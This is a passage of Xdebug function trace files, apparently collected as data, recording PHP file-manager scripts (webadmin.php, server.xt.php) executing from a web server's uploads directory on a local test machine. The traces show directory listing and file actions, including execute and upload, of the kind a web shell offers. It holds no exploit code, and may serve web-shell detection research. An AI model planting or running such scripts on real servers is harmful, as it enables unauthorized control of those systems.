'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	465	1	0.021793	803008
4	465	R			6
4	466	0	0.021807	803136	html	1		/var/www/html/uploads/webadmin.php	1387	1	'/var/www/html/uploads/'
5	467	0	0.021820	803136	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/'	2	NULL
5	467	1	0.021835	803408
5	467	R			'/var/www/html/uploads/'
4	466	1	0.021851	803296
4	466	R			'/var/www/html/uploads/'
3		A						/var/www/html/uploads/webadmin.php	1390	$actions = []
4	468	0	0.021890	802376	dirname	0		/var/www/html/uploads/webadmin.php	1391	1	'/var/www/html/uploads/webadmin.php'
4	468	1	0.021903	802472
4	468	R			'/var/www/html/uploads'
4	469	0	0.021917	802440	is_writable	0		/var/www/html/uploads/webadmin.php	1391	1	'/var/www/html/uploads'
4	469	1	0.021935	802480
4	469	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	1392	$actions[] = 'delete'
3		A						/var/www/html/uploads/webadmin.php	1393	$actions[] = 'move'
3		A						/var/www/html/uploads/webadmin.php	1395	$actions[] = 'copy'
4	470	0	0.021980	802752	str_repeat	0		/var/www/html/uploads/webadmin.php	1398	2	'&nbsp;'	30
4	470	1	0.021994	803040
4	470	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	471	0	0.022011	802808	word	1		/var/www/html/uploads/webadmin.php	1402	1	'delete'
5	472	0	0.022024	802808	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'delete'	2	'UTF-8'
5	472	1	0.022038	803080
5	472	R			'delete'
4	471	1	0.022052	802968
4	471	R			'delete'
4	473	0	0.022066	802800	word	1		/var/www/html/uploads/webadmin.php	1402	1	'move'
5	474	0	0.022079	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'move'	2	'UTF-8'
5	474	1	0.022093	803072
5	474	R			'move'
4	473	1	0.022106	802960
4	473	R			'move'
4	475	0	0.022120	802800	word	1		/var/www/html/uploads/webadmin.php	1402	1	'copy'
5	476	0	0.022132	802800	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'copy'	2	'UTF-8'
5	476	1	0.022147	803072
5	476	R			'copy'
4	475	1	0.022160	802960
4	475	R			'copy'
3	203	1	0.022174	802216
3	477	0	0.022184	802216	html_footer	1		/var/www/html/uploads/webadmin.php	1225	0
3	477	1	0.022197	802216
2	50	1	0.022206	792880
1	3	1	0.022222	792880
			0.022310	575664
TRACE END   [2023-02-12 21:19:02.526152]

data/traces/720d527f359bd8515f5cf46648ebfab4_trace-1676253117.0623.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:52:22.960130]
1	0	1	0.000193	393528
1	3	0	0.002046	789672	{main}	1		/var/www/html/uploads/server.xt.php	0	0
1		A						/var/www/html/uploads/server.xt.php	131	$lang = 'auto'
1		A						/var/www/html/uploads/server.xt.php	136	$homedir = './'
1		A						/var/www/html/uploads/server.xt.php	140	$editcols = 80
1		A						/var/www/html/uploads/server.xt.php	141	$editrows = 25
1		A						/var/www/html/uploads/server.xt.php	159	$htaccess = '.htaccess'
1		A						/var/www/html/uploads/server.xt.php	160	$htpasswd = '.htpasswd'
2	4	0	0.002135	789672	get_magic_quotes_gpc	0		/var/www/html/uploads/server.xt.php	164	0
2	4	1	0.002148	789672
2	4	R			FALSE
2	5	0	0.002163	789672	array_key_exists	0		/var/www/html/uploads/server.xt.php	170	2	'image'	[]
2	5	1	0.002178	789736
2	5	R			FALSE
2	6	0	0.002191	789672	function_exists	0		/var/www/html/uploads/server.xt.php	175	1	'lstat'
2	6	1	0.002205	789712
2	6	R			TRUE
1		A						/var/www/html/uploads/server.xt.php	181	$delim = '/'
2	7	0	0.002227	789672	function_exists	0		/var/www/html/uploads/server.xt.php	183	1	'php_uname'
2	7	1	0.002241	789712
2	7	R			TRUE
2	8	0	0.002253	789672	substr	0		/var/www/html/uploads/server.xt.php	184	3	'Linux'	0	3
2	8	1	0.002267	789800
2	8	R			'Lin'
2	9	0	0.002280	789704	strtoupper	0		/var/www/html/uploads/server.xt.php	184	1	'Lin'
2	9	1	0.002293	789768
2	9	R			'LIN'
1		A						/var/www/html/uploads/server.xt.php	184	$win = FALSE
2	10	0	0.002318	789672	dirname	0		/var/www/html/uploads/server.xt.php	192	1	'/var/www/html/uploads/server.xt.php'
2	10	1	0.002331	789768
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/server.xt.php	192	$scriptdir = '/var/www/html/uploads'
2	11	0	0.002373	789736	relative2absolute	1		/var/www/html/uploads/server.xt.php	198	2	'./'	'/var/www/html/uploads'
3	12	0	0.002387	789736	path_is_relative	1		/var/www/html/uploads/server.xt.php	1080	1	'./'
4	13	0	0.002400	789760	substr	0		/var/www/html/uploads/server.xt.php	1094	3	'./'	0	1
4	13	1	0.002414	789856
4	13	R			'.'
3	12	1	0.002428	789760
3	12	R			TRUE
3	14	0	0.002441	789760	addslash	1		/var/www/html/uploads/server.xt.php	1081	1	'/var/www/html/uploads'
4	15	0	0.002454	789784	substr	0		/var/www/html/uploads/server.xt.php	1070	3	'/var/www/html/uploads'	-1	1
4	15	1	0.002467	789880
4	15	R			's'
3	14	1	0.002481	789832
3	14	R			'/var/www/html/uploads/'
3	16	0	0.002496	789840	simplify_path	1		/var/www/html/uploads/server.xt.php	1081	1	'/var/www/html/uploads/./'
4	17	0	0.002509	789840	file_exists	0		/var/www/html/uploads/server.xt.php	1121	1	'/var/www/html/uploads/./'
4	17	1	0.002528	789880
4	17	R			TRUE
4	18	0	0.002541	789840	function_exists	0		/var/www/html/uploads/server.xt.php	1121	1	'realpath'
4	18	1	0.002554	789880
4	18	R			TRUE
4	19	0	0.002566	789840	realpath	0		/var/www/html/uploads/server.xt.php	1121	1	'/var/www/html/uploads/./'
4	19	1	0.002580	789920
4	19	R			'/var/www/html/uploads'
4	20	0	0.002594	789840	realpath	0		/var/www/html/uploads/server.xt.php	1122	1	'/var/www/html/uploads/./'
4	20	1	0.002607	789920
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/server.xt.php	1122	$path = '/var/www/html/uploads'
4	21	0	0.002631	789888	is_dir	0		/var/www/html/uploads/server.xt.php	1123	1	'/var/www/html/uploads'
4	21	1	0.002647	789952
4	21	R			TRUE
4	22	0	0.002660	789912	addslash	1		/var/www/html/uploads/server.xt.php	1124	1	'/var/www/html/uploads'
5	23	0	0.002672	789912	substr	0		/var/www/html/uploads/server.xt.php	1070	3	'/var/www/html/uploads'	-1	1
5	23	1	0.002686	790008
5	23	R			's'
4	22	1	0.002699	789960
4	22	R			'/var/www/html/uploads/'
3	16	1	0.002713	789912
3	16	R			'/var/www/html/uploads/'
2	11	1	0.002727	789856
2	11	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/server.xt.php	198	$homedir = '/var/www/html/uploads/'
2	24	0	0.002751	789856	array_key_exists	0		/var/www/html/uploads/server.xt.php	200	2	'dir'	[]
2	24	1	0.002765	789920
2	24	R			FALSE
1		A						/var/www/html/uploads/server.xt.php	200	$dir = '/var/www/html/uploads/'
2	25	0	0.002788	789856	array_key_exists	0		/var/www/html/uploads/server.xt.php	202	2	'olddir'	[]
2	25	1	0.002807	789920
2	25	R			FALSE
2	26	0	0.002820	789856	addslash	1		/var/www/html/uploads/server.xt.php	206	1	'/var/www/html/uploads/'
3	27	0	0.002833	789856	substr	0		/var/www/html/uploads/server.xt.php	1070	3	'/var/www/html/uploads/'	-1	1
3	27	1	0.002846	789952
3	27	R			'/'
2	26	1	0.002859	789856
2	26	R			'/var/www/html/uploads/'
2	28	0	0.002873	789856	simplify_path	1		/var/www/html/uploads/server.xt.php	206	1	'/var/www/html/uploads/'
3	29	0	0.002885	789856	file_exists	0		/var/www/html/uploads/server.xt.php	1121	1	'/var/www/html/uploads/'
3	29	1	0.002901	789896
3	29	R			TRUE
3	30	0	0.002913	789856	function_exists	0		/var/www/html/uploads/server.xt.php	1121	1	'realpath'
3	30	1	0.002926	789896
3	30	R			TRUE
3	31	0	0.002939	789856	realpath	0		/var/www/html/uploads/server.xt.php	1121	1	'/var/www/html/uploads/'
3	31	1	0.002951	789936
3	31	R			'/var/www/html/uploads'
3	32	0	0.002965	789856	realpath	0		/var/www/html/uploads/server.xt.php	1122	1	'/var/www/html/uploads/'
3	32	1	0.002977	789936
3	32	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/server.xt.php	1122	$path = '/var/www/html/uploads'
3	33	0	0.003001	789904	is_dir	0		/var/www/html/uploads/server.xt.php	1123	1	'/var/www/html/uploads'
3	33	1	0.003014	789944
3	33	R			TRUE
3	34	0	0.003026	789904	addslash	1		/var/www/html/uploads/server.xt.php	1124	1	'/var/www/html/uploads'
4	35	0	0.003039	789904	substr	0		/var/www/html/uploads/server.xt.php	1070	3	'/var/www/html/uploads'	-1	1
4	35	1	0.003051	790000
4	35	R			's'
3	34	1	0.003065	789952
3	34	R			'/var/www/html/uploads/'
2	28	1	0.003079	789904
2	28	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/server.xt.php	206	$directory = '/var/www/html/uploads/'
1		A						/var/www/html/uploads/server.xt.php	208	$files = []
1		A						/var/www/html/uploads/server.xt.php	209	$action = ''
2	36	0	0.003124	789904	array_key_exists	0		/var/www/html/uploads/server.xt.php	223	2	'num'	[]
2	36	1	0.003138	789968
2	36	R			FALSE
2	37	0	0.003152	789904	array_key_exists	0		/var/www/html/uploads/server.xt.php	232	2	'focus'	[]
2	37	1	0.003166	789968
2	37	R			FALSE
2	38	0	0.003178	789904	sizeof	0		/var/www/html/uploads/server.xt.php	242	1	[]
2	38	1	0.003191	789936
2	38	R			0
1		A						/var/www/html/uploads/server.xt.php	242	$action = ''
2	39	0	0.003214	789904	array_key_exists	0		/var/www/html/uploads/server.xt.php	245	2	'HTTP_ACCEPT_LANGUAGE'	['HTTP_HOST' => 'localhost', 'HTTP_USER_AGENT' => 'python-requests/2.25.1', 'HTTP_ACCEPT_ENCODING' => 'gzip, deflate', 'HTTP_ACCEPT' => '*/*', 'HTTP_CONNECTION' => 'keep-alive', 'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin', 'SERVER_SIGNATURE' => '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n', 'SERVER_SOFTWARE' => 'Apache/2.4.52 (Ubuntu)', 'SERVER_NAME' => 'localhost', 'SERVER_ADDR' => '127.0.0.1', 'SERVER_PORT' => '80', 'REMOTE_ADDR' => '127.0.0.1', 'DOCUMENT_ROOT' => '/var/www/html', 'REQUEST_SCHEME' => 'http', 'CONTEXT_PREFIX' => '', 'CONTEXT_DOCUMENT_ROOT' => '/var/www/html', 'SERVER_ADMIN' => 'webmaster@localhost', 'SCRIPT_FILENAME' => '/var/www/html/uploads/server.xt.php', 'REMOTE_PORT' => '56244', 'GATEWAY_INTERFACE' => 'CGI/1.1', 'SERVER_PROTOCOL' => 'HTTP/1.1', 'REQUEST_METHOD' => 'GET', 'QUERY_STRING' => '', 'REQUEST_URI' => '/uploads/server.xt.php', 'SCRIPT_NAME' => '/uploads/server.xt.php', 'PHP_SELF' => '/uploads/server.xt.php', 'REQUEST_TIME_FLOAT' => 1676253117.062, 'REQUEST_TIME' => 1676253117]
2	39	1	0.003267	789968
2	39	R			FALSE
1		A						/var/www/html/uploads/server.xt.php	248	$lang = 'en'
2	40	0	0.003291	789904	getwords	1		/var/www/html/uploads/server.xt.php	252	1	'en'
2		A						/var/www/html/uploads/server.xt.php	1620	$word_charset = 'UTF-8'
2		A						/var/www/html/uploads/server.xt.php	2472	$date_format = 'n/j/y H:i:s'
2	40	1	0.003326	789952
2	40	R			['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/server.xt.php	252	$words = ['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/server.xt.php	258	$cols = 7
2	41	0	0.003526	789952	function_exists	0		/var/www/html/uploads/server.xt.php	261	1	'umask'
2	41	1	0.003540	789992
2	41	R			TRUE
2	42	0	0.003554	789952	umask	0		/var/www/html/uploads/server.xt.php	261	0
2	42	1	0.003566	789952
2	42	R			18
1		A						/var/www/html/uploads/server.xt.php	261	$dirpermission = 493
2	43	0	0.003590	789952	function_exists	0		/var/www/html/uploads/server.xt.php	264	1	'umask'
2	43	1	0.003603	789992
2	43	R			TRUE
2	44	0	0.003616	789952	umask	0		/var/www/html/uploads/server.xt.php	264	0
2	44	1	0.003628	789952
2	44	R			18
1		A						/var/www/html/uploads/server.xt.php	264	$filepermission = 420
2	45	0	0.003652	789952	basename	0		/var/www/html/uploads/server.xt.php	268	1	'/uploads/server.xt.php'
2	45	1	0.003668	790024
2	45	R			'server.xt.php'
2	46	0	0.003682	789992	html	1		/var/www/html/uploads/server.xt.php	268	1	'server.xt.php'
3	47	0	0.003695	790016	htmlentities	0		/var/www/html/uploads/server.xt.php	1594	3	'server.xt.php'	2	NULL
3	47	1	0.003712	790288
3	47	R			'server.xt.php'
2	46	1	0.003726	790176
2	46	R			'server.xt.php'
1		A						/var/www/html/uploads/server.xt.php	268	$self = 'server.xt.php'
2	48	0	0.003767	790136	substr	0		/var/www/html/uploads/server.xt.php	276	3	'Apache/2.4.52 (Ubuntu)'	0	6
2	48	1	0.003783	790264
2	48	R			'Apache'
2	49	0	0.003797	790168	strtolower	0		/var/www/html/uploads/server.xt.php	276	1	'Apache'
2	49	1	0.003810	790232
2	49	R			'apache'
1		A						/var/www/html/uploads/server.xt.php	277	$apache = TRUE
2	50	0	0.003835	790136	listing_page	1		/var/www/html/uploads/server.xt.php	842	1	???
3	51	0	0.003848	790232	html_header	1		/var/www/html/uploads/server.xt.php	1184	0
3	51	1	0.003862	790232
3	52	0	0.003869	790232	getlist	1		/var/www/html/uploads/server.xt.php	1186	1	'/var/www/html/uploads/'
4	53	0	0.003882	790232	opendir	0		/var/www/html/uploads/server.xt.php	851	1	'/var/www/html/uploads/'
4	53	1	0.003903	790624
4	53	R			resource(4) of type (stream)
3		A						/var/www/html/uploads/server.xt.php	851	$d = resource(4) of type (stream)
4	54	0	0.003930	790592	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	54	1	0.003951	790672
4	54	R			'server.xt.php'
3		A						/var/www/html/uploads/server.xt.php	853	$filename = 'server.xt.php'
3		A						/var/www/html/uploads/server.xt.php	855	$path = '/var/www/html/uploads/server.xt.php'
4	55	0	0.003987	790696	lstat	0		/var/www/html/uploads/server.xt.php	857	1	'/var/www/html/uploads/server.xt.php'
4	55	1	0.004004	792528
4	55	R			[0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 152]
3		A						/var/www/html/uploads/server.xt.php	857	$stat = [0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676253117, 9 => 1676253117, 10 => 1676253117, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676253117, 'mtime' => 1676253117, 'ctime' => 1676253117, 'blksize' => 4096, 'blocks' => 152]
4	56	0	0.004067	793184	is_file	0		/var/www/html/uploads/server.xt.php	862	1	'/var/www/html/uploads/server.xt.php'
4	56	1	0.004083	793240
4	56	R			TRUE
4	57	0	0.004096	793200	is_dir	0		/var/www/html/uploads/server.xt.php	863	1	'/var/www/html/uploads/server.xt.php'
4	57	1	0.004109	793240
4	57	R			FALSE
4	58	0	0.004122	793200	is_link	0		/var/www/html/uploads/server.xt.php	864	1	'/var/www/html/uploads/server.xt.php'
4	58	1	0.004135	793240
4	58	R			FALSE
4	59	0	0.004147	793200	is_readable	0		/var/www/html/uploads/server.xt.php	865	1	'/var/www/html/uploads/server.xt.php'
4	59	1	0.004162	793240
4	59	R			TRUE
4	60	0	0.004175	793200	is_writable	0		/var/www/html/uploads/server.xt.php	866	1	'/var/www/html/uploads/server.xt.php'
4	60	1	0.004190	793240
4	60	R			FALSE
4	61	0	0.004208	793200	filemtime	0		/var/www/html/uploads/server.xt.php	871	1	'/var/www/html/uploads/server.xt.php'
4	61	1	0.004221	793240
4	61	R			1676253117
4	62	0	0.004234	793200	fileatime	0		/var/www/html/uploads/server.xt.php	872	1	'/var/www/html/uploads/server.xt.php'
4	62	1	0.004247	793240
4	62	R			1676253117
4	63	0	0.004259	793200	filectime	0		/var/www/html/uploads/server.xt.php	873	1	'/var/www/html/uploads/server.xt.php'
4	63	1	0.004272	793240
4	63	R			1676253117
3		A						/var/www/html/uploads/server.xt.php	873	$file = ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117]
4	64	0	0.004311	793200	is_executable	0		/var/www/html/uploads/server.xt.php	880	1	'/var/www/html/uploads/server.xt.php'
4	64	1	0.004326	793240
4	64	R			FALSE
3		A						/var/www/html/uploads/server.xt.php	880	$file['is_executable'] = FALSE
4	65	0	0.004352	793200	function_exists	0		/var/www/html/uploads/server.xt.php	888	1	'posix_getpwuid'
4	65	1	0.004366	793240
4	65	R			TRUE
4	66	0	0.004378	793200	posix_getpwuid	0		/var/www/html/uploads/server.xt.php	888	1	1000
4	66	1	0.004418	794016
4	66	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	67	0	0.004442	793984	reset	0		/var/www/html/uploads/server.xt.php	888	1	['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	67	1	0.004462	794392
4	67	R			'osboxes'
3		A						/var/www/html/uploads/server.xt.php	888	$file['owner_name'] = 'osboxes'
4	68	0	0.004488	793232	function_exists	0		/var/www/html/uploads/server.xt.php	889	1	'posix_getgrgid'
4	68	1	0.004502	793272
4	68	R			TRUE
4	69	0	0.004515	793232	posix_getgrgid	0		/var/www/html/uploads/server.xt.php	889	1	1000
4	69	1	0.004549	793888
4	69	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	70	0	0.004569	793856	reset	0		/var/www/html/uploads/server.xt.php	889	1	['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	70	1	0.004586	794264
4	70	R			'osboxes'
3		A						/var/www/html/uploads/server.xt.php	889	$file['group_name'] = 'osboxes'
3		A						/var/www/html/uploads/server.xt.php	891	$files[] = ['filename' => 'server.xt.php', 'path' => '/var/www/html/uploads/server.xt.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676253117, 'atime' => 1676253117, 'ctime' => 1676253117, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	71	0	0.004640	794280	readdir	0		/var/www/html/uploads/server.xt.php	853	1	resource(4) of type (stream)
4	71	1	0.004654	794352
4	71	R			'..'
3		A						/var/www/html/uploads/server.xt.php	853	$filename = '..'
3		A						/var/www/html/uploads/server.xt.php	855	$path = '/var/www/html/uploads/..'
4	72	0	0.004688	794368	lstat	0		/var/www/html/uploads/server.xt.php	857	1	'/var/www/html/uploads/..'
4	72	1	0.004705	796152
4	72	R			[0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676253116, 9 => 1676253116, 10 => 1676253116, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676253116, 'mtime' => 1676253116, 'ctime' => 1676253116, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/server.xt.php	857	$stat = [0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676253116, 9 => 1676253116, 10 => 1676253116, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676253116, 'mtime' => 1676253116, 'ctime' => 1676253116, 'blksize' => 4096, 'blocks' => 8]
4	73	0	0.004765	795056	is_file	0		/var/www/html/uploads/server.xt.php	862	1	'/var/www/html/uploads/..'
4	73	1	0.004780	795088
4	73	R			FALSE
4	74	0	0.004794	795048	is_dir	0		/var/www/html/uploads/server.xt.php	863	1	'/var/www/html/uploads/..'
4	74	1	0.004807	795088
4	74	R			TRUE
4	75	0	0.004819	795048	is_link	0		/var/www/html/uploads/server.xt.php	864	1	'/var/www/html/uploads/..'
4	75	1	0.004832	795088
4	75	R			FALSE
4	76	0	0.004845	795048	is_readable	0		/var/www/html/uploads/server.xt.php	865	1	'/var/www/html/uploads/..'
4	76	1	0.004860	795088
4	76	R			TRUE
4	77	0	0.004873	795048	is_writable	0		/var/www/html/uploads/server.xt.php	866	1	'/var/www/html/uploads/..'
4	77	1	0.004887	795088
4	77	R			TRUE
4	78	0	0.004900	795048	filemtime	0		/var/www/html/uploads/server.xt.php	871	1	'/var/www/html/uploads/..'
4	78	1	0.004913	795088
4	78	R			1676253116
4	79	0	0.004926	795048	fileatime	0		/var/www/html/uploads/server.xt.php	872	1	'/var/www/html/uploads/..'
4	79	1	0.004938	795088
4	79	R			1676253116
4	80	0	0.004957	795048	filectime	0		/var/www/html/uploads/server.xt.php	873	1	'/var/www/html/uploads/..'
4	80	1	0.004969	795088
4	80	R			1676253116
3		A						/var/www/html/uploads/server.xt.php	873	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676253116, 'atime' => 1676253116, 'ctime' => 1676253116]
4	81	0	0.005008	795104	file_exists	0		/var/www/html/uploads/server.xt.php	877	1	'/var/www/html/uploads/../.'
4	81	1	0.005023	795144
4	81	R			TRUE
3		A						/var/www/html/uploads/server.xt.php	877	$file['is_executable'] = TRUE
4	82	0	0.005049	795048	function_exists	0		/var/www/html/uploads/server.xt.php	888	1	'posix_getpwuid'
4	82	1	0.005062	795088
4	82	R			TRUE
4	83	0	0.005075	795048	posix_getpwuid	0		/var/www/html/uploads/server.xt.php	888	1	0
4	83	1	0.005097	795848
4	83	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	84	0	0.005120	795816	reset	0		/var/www/html/uploads/server.xt.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	84	1	0.005140	796224
4	84	R			'root'
3		A						/var/www/html/uploads/server.xt.php	888	$file['owner_name'] = 'root'
